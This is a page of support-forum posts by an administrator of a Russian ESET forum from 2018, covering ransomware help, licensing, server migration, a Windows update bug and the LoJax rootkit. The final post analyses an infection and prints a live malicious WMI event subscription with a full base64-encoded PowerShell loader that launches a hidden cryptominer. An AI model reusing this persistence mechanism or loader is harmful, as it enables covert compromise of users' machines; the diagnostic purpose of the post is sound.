Дорогие участники форума!

Наш форум переведен в режим работы "только для чтения", публикация новых тем и сообщений недоступна. Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше. После официального ухода компании ESET с российского рынка мы приступили к разработке новых продуктов вместе с новыми партнёрами. Приглашаем вас присоединиться к нашему новому форуму PRO32.

Мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новые продукты компании PRO32.

PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств. Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

Перейти на PRO32
Поиск  Пользователи  Правила  Войти
Пользователи santy
Выбрать дату в календареВыбрать дату в календаре

Пред. 1 ... 179 180 181 182 183 184 185 186 187 188 189 ... 1784 След.
WannaCash
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 09.10.2018 13:39:50
судя, по id ransomware файлы дешифруемы
https://id-ransomware.malwarehunterteam.com/identify.php?case=4995c148d8ebb1527da228b74b768ef5e2437f58

если у вас есть лицензия на продукты ESET, можно обратиться за помощью в расшифровке в [email protected]
[ Как создать образ автозапуска? ]
Перейти
WannaCash
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 09.10.2018 13:11:53
@dion den,

добавьте образ автозапуска системы, в которой было шифрование
+
несколько зашифрованных файлов в архиве.
[ Как создать образ автозапуска? ]
Перейти
[ Закрыто] Продление/покупка/расширение/перенос/конвертирование лицензии, главная
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 06.10.2018 17:39:21
Цитата
Елена Болотова написал:
Здравствуйте, скажите пожалуйста, что нужно сделать, чтобы начал работать антивирус? 19.09.2018 был куплен антивирус ESET NOD32 Антивирус на 1ПК 1 год, заказ №000222152,
здравствуйте,
надо скачать актуальную версию продукта ESET с оф.сайта, установить и активировать установленный продукт с помощью купленной вами лицензии.
[ Как создать образ автозапуска? ]
Перейти
поговорить о uVS, Carberp, планете Земля
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 06.10.2018 07:32:18
Reports are coming in that users are running into many issues after installing the Windows 10 October 2018 update. The biggest problem is that people have found that huge amounts of their documents and other files were deleted after the update was installed.

With the amount of issues that users are currently seeing, it may be wise to defer the installation of this update until Microsoft has had more time to resolve the bugs that users are seeing.  Information on how to do this will be explained at the end of the article.
-------------------
Появляются сообщения о том, что после установки обновления Windows 10 октября 2018 года пользователи сталкиваются со многими проблемами. Самая большая проблема заключается в том, что люди обнаружили, что огромное количество их документов и других файлов было удалено после установки обновления.

С учетом количества проблем, которые пользователи видят в настоящее время, может быть разумным отложить установку этого обновления до тех пор, пока у Microsoft не будет больше времени для устранения ошибок, которые видят пользователи. Информация о том, как это сделать, будет объяснена в конце статьи.

из отзывов пользователей (маты пропущены):
Цитата
Моя папка «Документы» была удалена так, что все мои личные документы (документы Word, электронные таблицы и т. Д.) Исчезли. Это на SSD NVMe с TRIM. Все ушли.
Мои последние резервные копии являются древними.

https://www.bleepingcomputer.com/news/microsoft/missing-files-bugs-reported-after-windows-10-october-2018-update/
[ Как создать образ автозапуска? ]
Перейти
Миграция сервера ESET NOD32 v 5.3, Не понятно как мигрировать сервер nod32 5.3
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 05.10.2018 12:32:10
да, проблема.
(в таких случаях надо пробную задачу создать для 1-2 клиентов, и убедиться что она сработала как надо,
тогда меньше шансов совершить ошибку на большой группе клиентов)
теперь только вручную править конфигурацию на клиентах, или через импорт файла конфигурации, который необходимо предварительно создать.
[ Как создать образ автозапуска? ]
Перейти
Миграция сервера ESET NOD32 v 5.3, Не понятно как мигрировать сервер nod32 5.3
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 05.10.2018 09:32:57
как вариант (без сохранения баз данных):

1. поднять второй сервер администрирования на втором ПК,
2. на первом сервере создать задачу по изменению настроек администрирования для всех клиентов.
   (указать в новых настройках имя (адрес) второго сервера администрирования)
3. дождаться пока выполнятся задачи, и все клиенты будут подключены к новому серверу администрирования.
4. удалить первый сервер администрирования с первого компа
[ Как создать образ автозапуска? ]
Перейти
поговорить о uVS, Carberp, планете Земля
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 05.10.2018 06:03:15
Цитата
RP55 RP55 написал:
Первый практический UEFI rootkit https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/
русский перевод статьи на xakep.ru

Цитата
Эксперты компании ESET рассказали об обнаружении вредоносной кампании, в ходе которой был задействован первый известный руткит для Unified Extensible Firmware Interface (UEFI). Ранее подобное обсуждалось лишь с теоретической точки зрения на ИБ-конференциях.

Исследователи пишут, что руткит для UEFI использует группа ... хакеров, известная под названиями APT28, Sednit, Fancy Bear, Strontium, Sofacy и так далее. По данным компании, зафиксирован как минимум один случай успешного внедрения вредоносного модуля во флеш-память SPI, что гарантирует злоумышленникам не только возможность сохранить присутствие в системе после переустановки ОС, но и после замены жесткого диска.

Для внедрения руткита злоумышленники используют малварь LoJax — «близнеца» легитимного решения LoJack от компании Absolute Software, созданного для защиты устройств от утери и кражи. Этот инструмент встраивается в UEFI и позволяет, к примеру, отслеживать местонахождение устройства или удаленно стереть данные.

Появление вредоносных версий LoJack было замечено аналитиками Arbor Networks еще весной текущего года. Тогда специалисты писали, что преступники незначительно изменили инструмент таким образом, чтобы он связывался с их управляющими серверами, а не с инфраструктурой Absolute Software. Эксперты Arbor Networks называли LoJax «идеальным двойным агентом», так как он может удаленно выполнить произвольный код в системе и практически не отличается от легитимной версии инструмента.

https://xakep.ru/2018/09/28/lojax/
[ Как создать образ автозапуска? ]
Перейти
файлы зашифрованы с расширением .cesar; .arena; .cobra; .java; .write; .arrow; .bip; .cmb;.combo, Filecoder.Crysis; r/n: info.hta
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 03.10.2018 07:45:18
@Деньга Большов,
добавьте образ автозапуска для проверки и очистки системы,
возможно остались вредоносные тела
Цитата
Файлы прикрепить не могу... - пишет "При сохранении файла произошла ошибка."
несколько зашифрованных файлов лучше добавить в архив
[ Как создать образ автозапуска? ]
Перейти
поговорить о uVS, Carberp, планете Земля
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 28.09.2018 09:44:18
в FRST добавили скриптовую проверку файлов на Вирустотал

Код
CreateRestorePoint:
CloseProcesses:
VirusTotal: C:\ProgramData\mbhelper.exe;C:\Windows\system32\drivers\WinD64.sys;C:\Windows\system32\drivers\WinD64loader.sys;C:\Users\User\AppData\Local\Temp\F891.tmp.exe;C:\Users\User\AppData\Local\Temp\nsw4A4A.tmp\System.dll
FF Plugin-x32: @t.garena.com/garenatalk -> C:\Program Files (x86)\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [No File]
CHR HKLM\...\Chrome\Extension: [looohgelibjoplmkhecmalapkgadkfcc] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [looohgelibjoplmkhecmalapkgadkfcc] - hxxps://clients2.google.com/service/update2/crx


с выводом результата в fixlog:

Цитата
Restore point was successfully created.
Processes closed successfully.
VirusTotal: C:\ProgramData\mbhelper.exe => https://www.virustotal.com/file/8345f6e1d8ce126f21e9bcf6e4d68f4548ccfe24634fbb4a21d­c10ded01b6117/analysis/1538008986/
VirusTotal: C:\Windows\system32\drivers\WinD64.sys => https://www.virustotal.com/file/5e2f7b4bf66c8488b5e45fa6cc4634277d6698efd9f0c484b40­69c5785149f6f/analysis/1508227164/
VirusTotal: C:\Windows\system32\drivers\WinD64loader.sys => https://www.virustotal.com/file/83bfa50a528762ec52a011302ac3874636fb7e26628cd7acfbf­2bdc9faa8110d/analysis/1536868377/
VirusTotal: C:\Users\User\AppData\Local\Temp\F891.tmp.exe => https://www.virustotal.com/file/0ca76058898c0032b16df7f2336aee1a8992cc8c024b1a84f1d­4b0e8d26c1af7/analysis/1534760526/
VirusTotal: C:\Users\User\AppData\Local\Temp\nsw4A4A.tmp\System.dll => (3) Error
"HKLM\Software\Wow6432Node\MozillaPlugins\@t.garena.com/garenatalk" => removed successfully
[ Как создать образ автозапуска? ]
Перейти
Win32/CoinMiner.DV, WMI/CommandLineEventConsumer/FsxxleFilter/powershell &base64_script
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 28.09.2018 09:29:04
похоже, здесь используется запуск через WMI закодированного скрипта, возможно именно этот скрипт содержит запуск майнера, связанного с процессом msiexec

Цитата
Полное имя                  C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
Имя файла                   POWERSHELL.EXE
Тек. статус                 ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную]
                           
Сохраненная информация      на момент создания образа
Статус                      ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную]
File_Id                     4A5BC7F377000
Linker                      9.0
Размер                      473600 байт
Создан                      14.07.2009 в 03:49:07
Изменен                     14.07.2009 в 05:39:20
                           
TimeStamp                   13.07.2009 в 23:49:07
EntryPoint                  +
OS Version                  0.1
Subsystem                   Windows character-mode user interface (CUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   64-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                           
Оригинальное имя            PowerShell.EXE.MUI
Версия файла                6.1.7600.16385 (win7_rtm.090713-1255)
Описание                    Windows PowerShell
Производитель               Microsoft Corporation
                           
Доп. информация             на момент обновления списка
SHA1                        5330FEDAD485E0E4C23B2ABE1075A1F984FDE9FC
MD5                         852D67A27E454BD389FA7F02A8CBE23F
                           
Namespace                   \\.\root\subscription
Consumer_Name               FsxxleConsumer
Consumer_Class              CommandLineEventConsumer
Consumer_CommandLineTemplatepowershell -exec bypass -W 1 -E aQBmACAAKAAoAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAg­AG0AcwBpAGUAeABlAGMAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMA­aQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQAuAFAAYQB0AGgAIAAt­AGUAcQAgACgAZABpAHIAIABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQA­KQAuAFYAYQBsAHUAZQArACcAXABQAGEAbgB0AGgAZQByAFwAbQBzAGkAZQB4­AGUAYwAuAGUAeABlACcAKQB7AGUAeABpAHQAfQBlAGwAcwBlAHsAUwB0AG8A­cAAtAFAAcgBvAGMAZQBzAHMAIAAtAG4AYQBtAGUAIABtAHMAaQBlAHgAZQBj­ACAALQBGAG8AcgBjAGUAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMA­aQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBTAHQAbwBwAC0AUABy­AG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAgAHgAbQByAGkAZwAgAC0ARgBvAHIA­YwBlACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABs­AHkAQwBvAG4AdABpAG4AdQBlADsAYwBkACAAJABlAG4AdgA6AHcAaQBuAGQA­aQByAFwAUABhAG4AdABoAGUAcgA7AGMAbwBwAHkAIAAkAGUAbgB2ADoAdwBp­AG4AZABpAHIAXABzAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAA­bwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABl­AGwAbAAuAGUAeABlACAAbQBzAGkAZQB4AGUAYwAuAGUAeABlACAALQBlAGEA­IABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlADsAYwBvAHAAeQAg­ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgBcAFMAeQBzAFcATwBXADYANABcAFcA­aQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABw­AG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIABtAHMAaQBlAHgAZQBjAC4A­ZQB4AGUAIAAtAGUAYQAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1­AGUAOwBzAHQAYQByAHQALQBwAHIAbwBjAGUAcwBzACAALgBcAG0AcwBpAGUA­eABlAGMALgBlAHgAZQAgAHsAJABXAG0AaQBOAGEAbQBlAD0AJwByAG8AbwB0­AFwAYwBpAG0AdgAyADoAVwBpAG4AMwAyAF8AUwB5AHMAQwBvAG0AbQBhAG4A­ZAAnADsAJABXAG0AaQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABNAGEAbgBh­AGcAZQBtAGUAbgB0AC4ATQBhAG4AYQBnAGUAbQBlAG4AdABDAGwAYQBzAHMA­KAAkAFcAbQBpAE4AYQBtAGUAKQA7ACQARgA9ACgAWwBXAG0AaQBDAGwAYQBz­AHMAXQAkAFcAbQBpAE4AYQBtAGUAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMA­WwAnAEYAJwBdAC4AVgBhAGwAdQBlADsASQBFAFgAIAAoAFsAUwB5AHMAdABl­AG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkA­SQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBu­AHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4A­ZwAoACQARgApACkAKQB9ACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABo­AGkAZABkAGUAbgB9ADsAZQB4AGkAdAA=
Filter_Name                 FsxxleFilter
Filter_Class                __EventFilter
Filter_Query                SELECT * FROM __InstanceModificationEvent WITHIN 720 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'
#MOF_Bind#                  
instance of __FilterToConsumerBinding
{
Consumer = "CommandLineEventConsumer.Name="FsxxleConsumer"";
Filter = "__EventFilter.Name="FsxxleFilter"";
};

#MOF_Event#                
instance of __EventFilter
{
EventNamespace = "root\\cimv2";
Name = "FsxxleFilter";
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 720 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";
QueryLanguage = "WQL";
};

#MOF_Consumer#              
instance of CommandLineEventConsumer
{
CommandLineTemplate = "powershell -exec bypass -W 1 -E aQBmACAAKAAoAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAg­AG0AcwBpAGUAeABlAGMAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMA­aQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQAuAFAAYQB0AGgAIAAt­AGUAcQAgACgAZABpAHIAIABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQA­KQAuAFYAYQBsAHUAZQArACcAXABQAGEAbgB0AGgAZQByAFwAbQBzAGkAZQB4­AGUAYwAuAGUAeABlACcAKQB7AGUAeABpAHQAfQBlAGwAcwBlAHsAUwB0AG8A­cAAtAFAAcgBvAGMAZQBzAHMAIAAtAG4AYQBtAGUAIABtAHMAaQBlAHgAZQBj­ACAALQBGAG8AcgBjAGUAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMA­aQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBTAHQAbwBwAC0AUABy­AG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAgAHgAbQByAGkAZwAgAC0ARgBvAHIA­YwBlACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABs­AHkAQwBvAG4AdABpAG4AdQBlADsAYwBkACAAJABlAG4AdgA6AHcAaQBuAGQA­aQByAFwAUABhAG4AdABoAGUAcgA7AGMAbwBwAHkAIAAkAGUAbgB2ADoAdwBp­AG4AZABpAHIAXABzAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAA­bwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABl­AGwAbAAuAGUAeABlACAAbQBzAGkAZQB4AGUAYwAuAGUAeABlACAALQBlAGEA­IABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlADsAYwBvAHAAeQAg­ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgBcAFMAeQBzAFcATwBXADYANABcAFcA­aQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABw­AG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIABtAHMAaQBlAHgAZQBjAC4A­ZQB4AGUAIAAtAGUAYQAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1­AGUAOwBzAHQAYQByAHQALQBwAHIAbwBjAGUAcwBzACAALgBcAG0AcwBpAGUA­eABlAGMALgBlAHgAZQAgAHsAJABXAG0AaQBOAGEAbQBlAD0AJwByAG8AbwB0­AFwAYwBpAG0AdgAyADoAVwBpAG4AMwAyAF8AUwB5AHMAQwBvAG0AbQBhAG4A­ZAAnADsAJABXAG0AaQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABNAGEAbgBh­AGcAZQBtAGUAbgB0AC4ATQBhAG4AYQBnAGUAbQBlAG4AdABDAGwAYQBzAHMA­KAAkAFcAbQBpAE4AYQBtAGUAKQA7ACQARgA9ACgAWwBXAG0AaQBDAGwAYQBz­AHMAXQAkAFcAbQBpAE4AYQBtAGUAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMA­WwAnAEYAJwBdAC4AVgBhAGwAdQBlADsASQBFAFgAIAAoAFsAUwB5AHMAdABl­AG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkA­SQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBu­AHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4A­ZwAoACQARgApACkAKQB9ACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABo­AGkAZABkAGUAbgB9ADsAZQB4AGkAdAA=";
Name = "FsxxleConsumer";
};
[ Как создать образ автозапуска? ]
Перейти
Пред. 1 ... 179 180 181 182 183 184 185 186 187 188 189 ... 1784 След.